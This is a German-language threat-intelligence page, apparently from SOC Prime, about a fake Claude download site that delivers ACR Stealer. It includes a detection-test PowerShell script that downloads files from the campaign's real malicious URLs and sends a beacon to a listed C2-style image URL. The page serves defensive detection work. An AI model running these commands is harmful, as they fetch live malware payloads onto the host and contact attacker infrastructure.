SOC Prime Bias: Mittel

26 May 2026 16:05 UTC
newspaper icon SANS Internet Storm Center

Klaude-Imitationsseite könnte ACR Stealer bereitstellen

Author Photo
SOC Prime Team linkedin icon Folgen
Klaude-Imitationsseite könnte ACR Stealer bereitstellen
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Zusammenfassung

Bedrohungsforscher identifizierten eine bösartige Werbekampagne, die Benutzer auf eine gefälschte Claude-Downloadseite weiterleitet. Die Seite liefert je nach Betriebssystem des Opfers unterschiedliche Nutzlasten, wobei die Infektionskette von Windows zur Bereitstellung von ACRStealer führt. Ermittler verknüpften die Aktivität mit mehreren kompromittierten Domains und einem Befehls- und Steuerungsserver, der nach der Infektion verwendet wird. Die Kampagne verlässt sich auf verschleierte URLs und ein PowerShell-Skript, um die Nutzlastlieferung abzuschließen.

Untersuchung

Der Analyst verfolgte die Aktivität von der anfänglichen gefälschten Claude-Seite über mehrere umgeleitete URLs, die über verschiedene Domains gehostet wurden. Während der Infektionskette wurden ein ZIP-Archiv, ein PowerShell-Skript und ein JPEG-Bild heruntergeladen, gefolgt von einer HTTPS-Kommunikation mit einer Befehls- und Steuerungsdomain. Die Verkehrsanalyse bestätigte, dass das Netzwerkverhalten nach der Infektion mit der Infrastruktur der ACRStealer-Familie übereinstimmte.

Abschwächung

Organisationen sollten die identifizierten bösartigen Domains und URLs am Netzwerkperimeter blockieren. Werbeverkehr sollte gefiltert werden, um bösartige Anzeigen zu identifizieren, die auf die gefälschte Claude-Seite oder ähnliche Nachahmungsversuche hinweisen. Endpunktschutz sollte ebenfalls so konfiguriert werden, dass ACRStealer-bezogenes Verhalten und verdächtige PowerShell-Ausführungen erkannt werden.

Reaktion

Verteidiger sollten auf ausgehende Verbindungen zur Befehls- und Steuerungsdomain yw.enhanceblabber.cc überwachen und bei Downloads des identifizierten ZIP-Archivs und PowerShell-Skripts Alarm schlagen. Jeder Host, der damit verbundene Aktivitäten zeigt, sollte einer forensischen Sammlung möglicher ACRStealer-Artefakte unterzogen und isoliert werden, falls ein Kompromiss bestätigt wird.

Angriffsfluss

Wir aktualisieren diesen Teil noch. Melden Sie sich an, um benachrichtigt zu werden

Benachrichtigen Sie mich

Simulationsergebnis

Voraussetzung: Die Telemetrie- & Baseline-Vorflugkontrolle muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die präzise Ausführung der gegnerischen Technik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und Erzählung müssen die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.

  • Angriffserzählung & Befehle:

    1. Anfänglicher Köder: Der Angreifer sendet eine Phishing-E-Mail mit einem Link zu https://fairpoint29.com/. Das Opfer klickt auf den Link, der eine gefälschte Claude-Download-Seite lädt.
    2. Ausführung des bösartigen Downloaders: Die Seite löst automatisch einen Download von https://primemetricsa.com/1518925aus, der eine getarnte Nutzlast liefert.
    3. Abholung der Sekundärnutzlast: Der heruntergeladene Stub kontaktiert https://6ryuefl.creativecommunityinfo.art/Camel-91267b64-989f-49b4-89b4-9e015844d42d um das vollständige ACR Stealer-Binary abzurufen.
    4. C2-Beacon: Einmal ausgeführt, sendet die Malware ein Beacon an https://i.ibb.co/Xx16sbMz/init-block.jpg (eine Technik, die die Bild-Hosting zur verdeckten C2 nutzt).

    Jeder Schritt erzeugt einen Proxy-Protokolleintrag, der exakt mit den im Sigma-Regel definierten Domain and url Werten übereinstimmt und dadurch die Erkennungsbedingung erfüllt.

  • Regressionstest-Skript:

    # -------------------------------------------------
# ACR Stealer Verteilungssimulation – Regel auslösen
# -------------------------------------------------
# Schritt 1: Gefälschte Claude-Download-Seite (harmloses GET)
Invoke-WebRequest -Uri "https://fairpoint29.com/" -UseBasicParsing | Out-Null

# Schritt 2: Downloader-Binärdatei (simuliert durch einen kleinen Dateidownload)
Invoke-WebRequest -Uri "https://primemetricsa.com/1518925" -OutFile "$env:TEMPloader.bin" -UseBasicParsing

# Schritt 3: Vollständiges Nutzlastabruf
Invoke-WebRequest -Uri "https://6ryuefl.creativecommunityinfo.art/Camel-91267b64-989f-49b4-89b4-9e015844d42d" `
  -OutFile "$env:TEMPacr_steler.bin" -UseBasicParsing

# Schritt 4: C2-Beacon (POST einer kleinen Bilddatei, um den Verkehr zu tarnen)
$body = [System.Text.Encoding]::UTF8.GetBytes("beacon")
Invoke-WebRequest -Uri "https://i.ibb.co/Xx16sbMz/init-block.jpg" `
  -Method Post -Body $body -ContentType "application/octet-stream" -UseBasicParsing | Out-Null
# -------------------------------------------------
# Ende der Simulation
# -------------------------------------------------

  • Aufräumbefehle:

    # Entfernen heruntergeladener Artefakte
Remove-Item "$env:TEMPloader.bin" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMPacr_steler.bin" -ErrorAction SilentlyContinue

# DNS-Cache leeren, um verbleibende Einträge zu vermeiden
ipconfig /flushdns

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten